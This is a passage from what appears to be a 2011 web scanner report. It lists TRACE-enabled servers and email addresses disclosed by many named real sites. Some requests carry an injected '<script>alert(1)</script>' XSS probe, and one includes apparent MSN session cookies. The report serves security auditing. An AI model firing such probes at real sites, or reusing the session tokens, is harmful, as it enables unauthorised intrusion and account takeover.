Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.wonderbackgrounds.com
Cookie: f3e639e0562f58f6

22.723. http://www.woodcraftplans.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.woodcraftplans.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.woodcraftplans.com
Cookie: 7af486795dddb1a2

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:34:32 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.woodcraftplans.com
Cookie: 7af486795dddb1a2

22.724. http://www.wordplays.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wordplays.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.wordplays.com
Cookie: 6047f9b07d0baf8b

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:05:45 GMT
Server: Apache/2.2.3 (CentOS) DAV/2 mod_fastcgi/2.4.6 PHP/5.1.6
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.wordplays.com
Cookie: 6047f9b07d0baf8b

22.725. http://www.workfromhomenews6.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.workfromhomenews6.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.workfromhomenews6.com
Cookie: 27925d662699650f

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:42:18 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.workfromhomenews6.com
Cookie: 27925d662699650f

22.726. http://www.worksourceoregon.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.worksourceoregon.org
Path:	/

Request

TRACE / HTTP/1.0
Host: www.worksourceoregon.org
Cookie: 4a404d08c6aa683e

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:36:33 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.worksourceoregon.org
Cookie: 4a404d08c6aa683e

22.727. http://www.wri.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wri.org
Path:	/

Request

TRACE / HTTP/1.0
Host: www.wri.org
Cookie: 6c7e588f08ed61a6

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:55:44 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.wri.org
Cookie: 6c7e588f08ed61a6

22.728. http://www.wwwamericanclassifieds.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wwwamericanclassifieds.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.wwwamericanclassifieds.com
Cookie: 12de049a47fefe2

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:38:04 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.wwwamericanclassifieds.com
Cookie: 12de049a47fefe2

22.729. http://www.x-y.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x-y.net
Path:	/

Request

TRACE / HTTP/1.0
Host: www.x-y.net
Cookie: 5ff6cd0f0474fcba

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:35:29 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.8
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.x-y.net
Cookie: 5ff6cd0f0474fcba

22.730. http://www.xaapa.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xaapa.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.xaapa.com
Cookie: 45904e58cf05c680

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:10:59 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.xaapa.com
Cookie: 45904e58cf05c680

22.731. http://www.xlasians.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xlasians.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.xlasians.com
Cookie: ce8ffbc2c365d96a

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:28:00 GMT
Server: Apache/2.0.59 (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.1 SVN/1.1.4
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.xlasians.com
Cookie: ce8ffbc2c365d96a

22.732. http://www.xoticpc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xoticpc.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.xoticpc.com
Cookie: 3e013b49b9194bd2

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:33:04 GMT
Server: Apache/1.3.37 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.8b
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 3e013b49b9194bd2
Host: www.xoticpc.com

22.733. http://www.xr77.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xr77.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.xr77.com
Cookie: 29dbd5934027f0c9

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:22:49 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.xr77.com
Cookie: 29dbd5934027f0c9

22.734. http://www.yankeefoliage.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yankeefoliage.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.yankeefoliage.com
Cookie: e8ba7fff0718f8bf

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:49:01 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.yankeefoliage.com
Cookie: e8ba7fff0718f8bf

22.735. http://www.ymlp163.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ymlp163.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.ymlp163.com
Cookie: df1af6b240d1b63

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:29:41 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.ymlp163.com
Cookie: df1af6b240d1b63

22.736. http://www.ymlp188.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ymlp188.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.ymlp188.com
Cookie: 97be8edc1c65fdaa

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:28:02 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.ymlp188.com
Cookie: 97be8edc1c65fdaa

22.737. http://www.yourinsights.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yourinsights.net
Path:	/

Request

TRACE / HTTP/1.0
Host: www.yourinsights.net
Cookie: 9d92c970590074d

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:57:22 GMT
Server: Apache/2.2.9 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.yourinsights.net
Cookie: 9d92c970590074d

22.738. http://www.youthfire.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youthfire.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.youthfire.com
Cookie: feed5fab3c30304e

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:19:54 GMT
Server: Apache/2.2.16 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.youthfire.com
Cookie: feed5fab3c30304e

22.739. http://www.zapak.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.zapak.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.zapak.com
Cookie: fc4c040caacdff7c

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:41:01 GMT
Server: ZWS
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.zapak.com
Cookie: fc4c040caacdff7c

23. Email addresses disclosed previous next
There are 77 instances of this issue:

http://ads.adbrite.com/adserver/vdi/742697
http://ads1.msn.com/library/dap.js
http://www.amateurclipz.com/favicon.ico
http://www.atomiclearning.com/favicon.ico
http://www.bobmovs.com/favicon.ico
http://www.boymale.net/favicon.ico
http://www.brighthorizons.com/favicon.ico
http://www.bucknell.edu/favicon.ico
http://www.cartoonterritory.com/favicon.ico
http://www.chemicalelements.com/favicon.ico
http://www.coinmerc.com/favicon.ico
http://www.crystal-co.com/favicon.ico
http://www.deguate.com/favicon.ico
http://www.diplo.de/favicon.ico
http://www.divorcemag.com/favicon.ico
http://www.donbest.com/favicon.ico
http://www.duplinschools.net/favicon.ico
http://www.fateback.com/favicon.ico
http://www.fb2share.com/favicon.ico
http://www.feetpics.net/favicon.ico
http://www.freehairypusssy.com/favicon.ico
http://www.freemomsvideo.com/favicon.ico
http://www.getfreedental.com/favicon.ico
http://www.ghettodoorway.com/favicon.ico
http://www.greatnow.com/favicon.ico
http://www.gwinnettcounty.com/favicon.ico
http://www.hairyholess.com/favicon.ico
http://www.hasoid-asian.com/favicon.ico
http://www.herehard.tv/favicon.ico
http://www.heresquirt.tv/favicon.ico
http://www.humiliation-of-slave.com/favicon.ico
http://www.hziegler.com/favicon.ico
http://www.innogames.de/favicon.ico
http://www.interstatemusic.com/favicon.ico
http://www.ipodarcade.com/favicon.ico
http://www.ius.edu/favicon.ico
http://www.legendamateurs.com/favicon.ico
http://www.mature-better.com/favicon.ico
http://www.maysville-online.com/content/tncms/live/global/resources/scripts/common.js
http://www.maysville-online.com/content/tncms/live/global/resources/scripts/facebox.js
http://www.maysville-online.com/content/tncms/live/global/resources/styles/skin.css
http://www.metroguide.com/favicon.ico
http://www.metroparks.org/favicon.ico
http://www.mkt3228.com/favicon.ico
http://www.mnnews.com/favicon.ico
http://www.monsterjam.com/favicon.ico
http://www.moultrieobserver.com/favicon.ico
http://www.mylovedanal.tv/favicon.ico
http://www.mylovedasses.tv/favicon.ico
http://www.mylovedrubber.com/favicon.ico
http://www.nationnews.com/favicon.ico
http://www.ntra.com/favicon.ico
http://www.okhistory.org/favicon.ico
http://www.paparazzibeach.net/favicon.ico
http://www.princesshouse.com/favicon.ico
http://www.qianlong.com/favicon.ico
http://www.rapescenes.net/favicon.ico
http://www.rb-hosting.de/favicon.ico
http://www.rv-clubs.us/favicon.ico
http://www.save2pc.com/favicon.ico
http://www.secretaryinstocking.com/favicon.ico
http://www.socializr.com/favicon.ico
http://www.sololadyboys.com/favicon.ico
http://www.stopsacidreflux.com/favicon.ico
http://www.tcoasttalk.com/favicon.ico
http://www.teriskitchen.com/favicon.ico
http://www.tireteam.com/favicon.ico
http://www.torontolife.com/favicon.ico
http://www.twoofus.org/favicon.ico
http://www.upskirtphotos.org/favicon.ico
http://www.vermontjoblink.com/favicon.ico
http://www.vintagefield.com/favicon.ico
http://www.wellspan.org/favicon.ico
http://www.wetmaturevids.com/favicon.ico
http://www.wordplays.com/favicon.ico
http://www.wylienews.com/favicon.ico
http://www.yardbarker.com/javascripts/all.js

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

23.1. http://ads.adbrite.com/adserver/vdi/742697 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/742697

Issue detail

The following email address was disclosed in the response:

4dc02231@cdn.turn.com

Request

Response

23.2. http://ads1.msn.com/library/dap.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads1.msn.com
Path:	/library/dap.js

Issue detail

The following email address was disclosed in the response:

inet@microsoft.com

Request

GET /library/dap.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads1.msn.com
Cookie: MSPAuth=9VKEZNJ2kHeZf5DjqiTT5ayxZ2MB4Vfoas4grycYoxNqXLCxNkaHTeeB0Ae2UIVOK2eRA2VXGt7eSf4sTc7Jn3lryqovNxq0cm2GBqwBYmR2z6*N0lWV8pLThWsaLUDa9r; MSPProf=9xJTwA1X1DNkB4dHZI0la7bGa9RBmEwDZfcMR0!4*FR03SVDp!TSTcVjOWVb0N8pQ3P7cUX7PXzD5KsyExcAmLhqfWmP7IYnA8KuVpGs7UZatXrWbCAZTO2U8YU7JCQKEh3thUKC2Uzw9rUAaMXDAYeEDPvhxswEO21W7RJBylpwweEVjq0GoqNg$$; MC1=V=3&GUID=d4eca2e468b14cb29283942850aea3de

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 17:06:35 GMT
Expires: Wed, 04 May 2011 19:27:11 GMT
Last-Modified: Tue, 15 Mar 2011 19:09:54 GMT
Cache-Control: max-age=172800
Content-Type: application/x-javascript
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))
X-Powered-By: ASP.NET
Vary: Accept-Encoding
X-WR-MODIFICATION: Content-Length
Content-Length: 13786

var _daprr=new Array('http://rad.msn.com/ADSAdClient31.dll?GetSAd=','http://a.rad.msn.com/ADSAdClient31.dll?GetSAd=', 'http://b.rad.msn.com/ADSAdClient31.dll?GetSAd=');var _daprs=0;var _daplp='http:/
...[SNIP]...

23.3. http://www.amateurclipz.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amateurclipz.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@advancedhosters.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.amateurclipz.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Tue, 03 May 2011 10:28:57 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.6
Content-Type: text/html; charset=iso-8859-1
Content-Length: 502

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...

23.4. http://www.atomiclearning.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.atomiclearning.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

cs@atomiclearning.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.atomiclearning.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:15:56 GMT
Server: Apache
Content-Length: 41708
Set-Cookie: platform_session=0684a7b9b10d110d27b33995013bac6e15572167; domain=atomiclearning.com; path=/; HttpOnly
P3P: CP="CAO PSA OUR"
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- served from pl
...[SNIP]...
<a href="mailto:cs@atomiclearning.com?subject=Site Error - Page not found">
...[SNIP]...
\n'
+ '\r\n'
+ 'If this problem persists, please contact'
+ ' Atomic Learning Customer Service:\r\n'
+ ' 1-320-631-5900 ext 8\r\n'
+ ' cs@atomiclearning.com\r\n'
+ '\r\n'
+ '\r\n'
+ 'The error message was:\r\n'
+ '\r\n'
+ 'Error in ' + prefix + ' chunk ' + chunk_number + ':'
+ msg);

...[SNIP]...

23.5. http://www.bobmovs.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bobmovs.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@advancedhosters.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bobmovs.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:44:30 GMT
Server: Apache/1.3.41 (Unix) PHP/4.4.8
Content-Type: text/html; charset=iso-8859-1
Content-Length: 324

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico was not found on this server.<P>
<HR>
<ADDR
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...

23.6. http://www.boymale.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.boymale.net
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@advancedhosters.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.boymale.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Tue, 03 May 2011 10:58:46 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.9
Content-Length: 525
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
<a href="mailto:webmaster@advancedhosters.com">
...[SNIP]...

23.7. http://www.brighthorizons.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.brighthorizons.com
Path:	/favicon.ico

Issue detail

The following email addresses were disclosed in the response:

bhfsweb@brighthorizons.com
clientservices@brighthorizons.com
parents@brighthorizons.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.brighthorizons.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Fri, 19 Feb 2010 17:59:32 GMT
Accept-Ranges: bytes
ETag: "09aca498db1ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
ws: 2
Date: Tue, 03 May 2011 11:23:29 GMT
Content-Length: 4246

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...
<a href="mailto:bhfsweb@brighthorizons.com">
...[SNIP]...
<a href="mailto:parents@brighthorizons.com">
parents@brighthorizons.com</a>
...[SNIP]...
<a href="mailto:clientservices@brighthorizons.com">clientservices@brighthorizons.com</a>
...[SNIP]...

23.8. http://www.bucknell.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bucknell.edu
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webdevelopment@bucknell.edu

Request

Response

23.9. http://www.cartoonterritory.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cartoonterritory.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@advancedhosters.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cartoonterritory.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Tue, 03 May 2011 10:15:47 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.6
Content-Type: text/html; charset=iso-8859-1
Content-Length: 506

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...

23.10. http://www.chemicalelements.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.chemicalelements.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@chemicalelements.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.chemicalelements.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:44:03 GMT
Server: Apache/2.2.17
Last-Modified: Thu, 12 Feb 2009 04:32:00 GMT
ETag: "1346-462b133861000"
Accept-Ranges: bytes
Content-Length: 4934
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3O//DTD W3 HTML 2.0//EN">
<html>
<head>
<title>Chemical Elements.com - File Not Found</title>
<meta name="description" content="An up-to-date periodic table with detail
...[SNIP]...
<meta name="author" content="Yinon Bentor - webmaster@chemicalelements.com">
...[SNIP]...
<a href="mailto:webmaster@chemicalelements.com">webmaster@chemicalelements.com</a>
...[SNIP]...
<a href="mailto:webmaster@chemicalelements.com">webmaster@chemicalelements.com</a>
...[SNIP]...

23.11. http://www.coinmerc.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.coinmerc.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

form@coinmerc.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.coinmerc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:37:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 64847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<title>
...[SNIP]...
<input type="hidden" name="recipient" value="form@coinmerc.com" />
...[SNIP]...

23.12. http://www.crystal-co.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.crystal-co.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

customerservice@yankeeretail.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.crystal-co.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:50:57 GMT
Server: Apache
Last-Modified: Wed, 30 Dec 2009 15:26:35 GMT
ETag: "46f03-1e000-c38e60c0"
Accept-Ranges: bytes
Content-Length: 122880
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Content-Type: text/html

<head>

<meta name="keywords" content="Waterford Crystal, Tracy Porter, Lenox China, Wedgwood, Jasperware, Vera Wang, Waterford, Evolution, Marquis, Riedel, Reidel, Wedgewood, Jasper, Gorham, Lennox,
...[SNIP]...
<a href="mailto:customerservice@yankeeretail.com?subject=Crystal Company - Questions"><font color="#6e6e6e">customerservice@yankeeretail.com
</font>
...[SNIP]...

23.13. http://www.deguate.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.deguate.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

info@deguate.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.deguate.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

23.14. http://www.diplo.de/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.diplo.de
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

service@babiel.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.diplo.de
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 417 Expectation failed
Server: squid
Date: Tue, 03 May 2011 10:36:48 GMT
Content-Type: text/html
Content-Length: 1387
X-Squid-Error: ERR_INVALID_REQ 0
X-Cache: MISS from squid
X-Cache-Lookup: NONE from squid:80
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<TITLE>ERROR
...[SNIP]...
<A HREF="mailto:service@babiel.com">service@babiel.com</A>
...[SNIP]...

23.15. http://www.divorcemag.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.divorcemag.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

support@divorcemagazine.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.divorcemag.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

23.16. http://www.donbest.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.donbest.com
Path:	/favicon.ico

Issue detail

The following email addresses were disclosed in the response:

marketing@donbest.com
webmaster@donbest.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.donbest.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:48:11 GMT
Server: Microsoft-IIS/6.0
node: 01
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=vlczw255t5fqew55fn1sxmim; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 41330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_pagehead">
...[SNIP]...
<a href="mailto:webmaster@donbest.com" style="color: #ffffff; text-decoration: none;">webmaster@donbest.com</a>
...[SNIP]...
<a href="mailto:marketing@donbest.com" class="footLink" title="[GMCP] Compose a new mail to Advertise" onclick="window.open('https://mail.google.com/mail/u/0/?view=cm&fs=1&tf=1&to=marketing@donbest.com','Compose new message','width=640,height=480');return false" rel="noreferrer">
...[SNIP]...

23.17. http://www.duplinschools.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.duplinschools.net
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

contactus@duplinschools.net

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
